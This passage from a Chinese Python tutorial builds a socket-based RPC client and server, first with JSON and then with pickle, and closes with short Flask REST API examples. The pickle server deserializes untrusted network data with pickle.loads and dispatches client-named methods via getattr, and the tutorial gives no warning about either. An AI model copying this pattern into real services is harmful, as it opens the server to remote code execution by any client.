str | string |
int, float | number |
True | true |
False | false |
None | null |
PS:序列化:json.dumps(obj)
,反序列化:json.loads(json_str)
在原有基础上只需要修改下Stub
的pack
和unpack
方法即可
Client_Stub(类型转换都省掉了)
import json
import socket
class ClientStub(object):
def pack(self, func, args):
"""打包:把方法和参数拼接成自定义的协议
格式:{"func": "sum", "args": [1, 2]}
"""
json_str = json.dumps({"func": func, "args": args})
# print(json_str) # log 输出
return json_str.encode("utf-8")
def unpack(self, data):
"""解包:获取返回结果"""
data = data.decode("utf-8")
# 格式应该是"{data:xxxx}"
data = json.loads(data)
# 获取不到就返回None
return data.get("data", None)
# 其他Code我没有改变
Server Stub()
import json
import socket
class ServerStub(object):
def unpack(self, data):
"""3.服务端的RPC Proxy组件把通过网络接收到的数据包按照相应格式进行拆包解码,获取方法名和参数"""
data = data.decode("utf-8")
# 格式应该是"格式:{"func": "sum", "args": [1, 2]}"
data = json.loads(data)
func, args = data["func"], data["args"]
if args:
return (func, tuple(args)) # (func,args)
return (func, )
def pack(self, result):
"""打包:把方法和参数拼接成自定义的协议"""
# 格式:"data:返回值"
json_str = json.dumps({"data": result})
return json_str.encode("utf-8")
# 其他Code我没有改变
输出图示:
RPC其实更多的是二进制的序列化方式,这边简单介绍下
官方文档:https://docs.python.org/3/library/pickle.html
用法和Json
类似,PS:序列化:pickle.dumps(obj)
,反序列化:pickle.loads(buffer)
和Json案例类似,也只是改了pack
和unpack
,我这边就贴一下完整代码(防止被吐槽)
1.Client
# 和上一节一样
from client_stub import ClientStub
def main():
stub = ClientStub(("192.168.36.144", 50051))
result = stub.get("sum", (1, 2))
print(f"1+2={result}")
result = stub.get("sum", (1.1, 2))
print(f"1.1+2={result}")
time_str = stub.get("get_time")
print(time_str)
if __name__ == "__main__":
main()
2.ClientStub
import socket
import pickle
class ClientStub(object):
def __init__(self, address):
"""address ==> (ip,port)"""
self.socket = socket.socket()
self.socket.connect(address)
def pack(self, func, args):
"""打包:把方法和参数拼接成自定义的协议"""
return pickle.dumps((func, args))
def unpack(self, data):
"""解包:获取返回结果"""
return pickle.loads(data)
def get(self, func, args=None):
"""1.客户端的RPC Proxy组件收到调用后,负责将被调用的方法名、参数等打包编码成自定义的协议"""
data = self.pack(func, args)
# 2.客户端的RPC Proxy组件在打包完成后通过网络把数据包发送给RPC Server
self.socket.send(data)
# 等待服务端返回结果
data = self.socket.recv(2048)
if data:
return self.unpack(data)
return None
3.Server
# 和上一节一样
import socket
from server_stub import ServerStub
class RPCServer(object):
def __init__(self, address, mycode):
self.mycode = mycode
# 服务端存根(RPC Proxy)
self.server_stub = ServerStub(mycode)
# TCP Socket
self.socket = socket.socket()
# 端口复用
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# 绑定端口
self.socket.bind(address)
def run(self):
self.socket.listen()
while True:
# 等待客户端连接
client_socket, client_addr = self.socket.accept()
print(f"来自{client_addr}的请求:\n")
try:
# 交给服务端存根(Server Proxy)处理
self.server_stub.handle(client_socket, client_addr)
except Exception as ex:
print(ex)
if __name__ == "__main__":
from server_code import MyCode
server = RPCServer(('', 50051), MyCode())
print("Server启动ing,Port:50051")
server.run()
4.ServerCode
# 和上一节一样
# 5.RPC Server(被调用者)本地执行后将结果返回给服务端的RPC Proxy
class MyCode(object):
def sum(self, a, b):
return a + b
def get_time(self):
import time
return time.ctime()
5.ServerStub
import socket
import pickle
class ServerStub(object):
def __init__(self, mycode):
self.mycode = mycode
def unpack(self, data):
"""3.服务端的RPC Proxy组件把通过网络接收到的数据包按照相应格式进行拆包解码,获取方法名和参数"""
func, args = pickle.loads(data)
if args:
return (func, args) # (func,args)
return (func, )
def pack(self, result):
"""打包:把方法和参数拼接成自定义的协议"""
return pickle.dumps(result)
def exec(self, func, args=None):
"""4.服务端的RPC Proxy组件根据方法名和参数进行本地调用"""
# 如果没有这个方法则返回None
func = getattr(self.mycode, func)
if args:
return func(*args) # 解包
else:
return func() # 无参函数
def handle(self, client_socket, client_addr):
while True:
# 获取客户端发送的数据包
data = client_socket.recv(2048)
if data:
try:
data = self.unpack(data) # 解包
if len(data) == 1:
data = self.exec(data[0]) # 执行无参函数
elif len(data) > 1:
data = self.exec(data[0], data[1]) # 执行带参函数
else:
data = "RPC Server Error Code:500"
except Exception as ex:
data = "RPC Server Function Error"
print(ex)
# 6.服务端的RPC Proxy组件将返回值打包编码成自定义的协议数据包,并通过网络发送给客户端的RPC Proxy组件
data = self.pack(data) # 把函数执行结果按指定协议打包
# 把处理过的数据发送给客户端
client_socket.send(data)
else:
print(f"客户端:{client_addr}已断开\n")
break
输出图示:
然后关于RPC高级的内容(会涉及到注册中心
),咱们后面说架构的时候继续,网络这边就说到这
RESTful只是接口协议规范,它是建立在http基础上的,我们在网络加强篇的末尾简单带一下,后面讲爬虫应该会再给大家说的
在编写REST接口时,一般都是为HTTP服务的。为了实现一个简单的REST接口,你只需让代码满足Python的WSGI
标准即可
这边我就不自己实现了(上面手写服务器的时候其实已经展示了Restful接口是啥样),用Flask
快速过一遍:
看个引入案例:
import flask
app = flask.Flask(__name__)
@app.route("/")
def index():
return "This is Restful API Test"
if __name__ == "__main__":
app.run()
图示输出:
Server Log:
* Serving Flask app "1.test" (lazy loading)
* Environment: production
WARNING: Do not use the development server in a production environment.
Use a production WSGI server instead.
* Debug mode: off
* Running on http://127.0.0.1:8080/ (Press CTRL+C to quit)
127.0.0.1 - - [17/Jan/2019 17:24:02] "GET / HTTP/1.1" 200 -
举个查询服务器节点
信息的例子:/api/servers/
import flask
from infos import info_list
app = flask.Flask(__name__)
# Json的404自定义处理(不加自定义处理会返回默认404页面)
@app.errorhandler(404)
def not_found(error):
return flask.make_response(
flask.jsonify({
"data": "Not Found",
"status": 404
}), 404)
# 运行Get和Post请求
@app.route("/api/v1.0/servers/<name>", methods=["GET", "POST"])
def get_info(name):
infos = list(filter(lambda item: item["name"] == name, info_list))
if len(infos) == 0:
flask.abort(404) # 404
# 基于json.dumps的封装版
return flask.jsonify({"infos": infos}) # 返回Json字符串
if __name__ == "__main__":
app.run(port=8080)
图示输出:(不深入说,后面爬虫会再提的)
课后拓展:
RESTful API 设计指南
http://www.ruanyifeng.com/blog/2014/05/restful_api.html
RESTful API 最佳实践
http://www.ruanyifeng.com/blog/2018/10/restful-api-best-practices.html
异步 API 的设计
http://www.ruanyifeng.com/blog/2018/12/async-api-design.html
使用python的Flask实现一个RESTful API服务器端[翻译]
https://www.cnblogs.com/vovlie/p/4178077.html